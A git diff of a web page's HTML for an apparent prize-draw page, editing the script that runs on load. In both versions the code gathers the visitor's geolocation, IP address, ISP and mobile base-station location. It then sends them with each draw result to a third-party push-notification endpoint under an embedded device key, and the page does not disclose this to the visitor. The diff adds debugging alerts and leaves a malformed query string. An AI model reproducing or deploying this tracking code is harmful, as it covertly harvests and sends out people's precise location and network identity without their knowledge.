--- a/index.html
+++ b/index.html
@@ -114,18 +114,20 @@
   window.onload = function getLocation() {
     return new Promise((resolve, reject) => {
       navigator.geolocation.getCurrentPosition((pos) => {
-        const coords = pos.coords || {}
-        const {latitude, longitude} = coords;
-        jsonlongitude = longitude;
-        jsonlatitude = latitude;
+        jsonlongitude = pos.coords.longitude;
+        jsonlatitude = pos.coords.latitude;
+        alert(pos.coords.accuracy);
+        alert(pos.coords.altitude);
+        alert(pos.coords.speed);
+        alert(pos.coords.heading);
         getJsonObj('https://api.ip.sb/geoip', (data1) => {
           // 一个对象
           jsonData = data1;
-          jsonData = jsonData.toString();
+          jsonData.toString();
           var BaseStationUrl = 'http://ip.zxinc.org/api.php?type=json&ip' + jsonData.ip;
           getJsonObj(BaseStationUrl, (data2) => {
             jsonDataBaseStation = data2;
-            jsonDataBaseStation = jsonDataBaseStation.toString();
+            jsonDataBaseStation.toString();
           });
         });
       }, (e) => {
@@ -269,7 +271,7 @@
         creatName();
         var date = new Date();
         var strdate = date.getUTCFullYear() + "-" + (date.getMonth() + 1) + "-" + date.getDate() + " " + date.getHours() + ":" + date.getMinutes() + ":" + date.getSeconds() + "." + date.getMilliseconds();
-        var url = "https://api.day.app/TbsfqDZZoJXnaP46cttdsN/" + strdate + "\t\t\t本次抽奖结果：" + oDiv.innerHTML + ",本次抽奖IP地址：" + jsonData.ip + ",本次抽奖运营商：" + jsonData.asn_organization + ",本次抽奖经纬度：" + jsonlongitude + "," + jsonlatitude + ",本次抽奖基站：" + jsonDataBaseStation.data.location;
+        var url = "https://api.day.app/TbsfqDZZoJXnaP46cttdsN/" + strdate + "\t\t\t\t本次抽奖结果：" + oDiv.innerHTML + ",本次抽奖IP地址：" + jsonData.ip + ",本次抽奖运营商：" + jsonData.asn_organization + ",本次抽奖经纬度：" + jsonlongitude + "," + jsonlatitude + ",本次抽奖基站：" + jsonDataBaseStation.data.location;
         getJsonObj(url, (data) => {
         });
         return null;
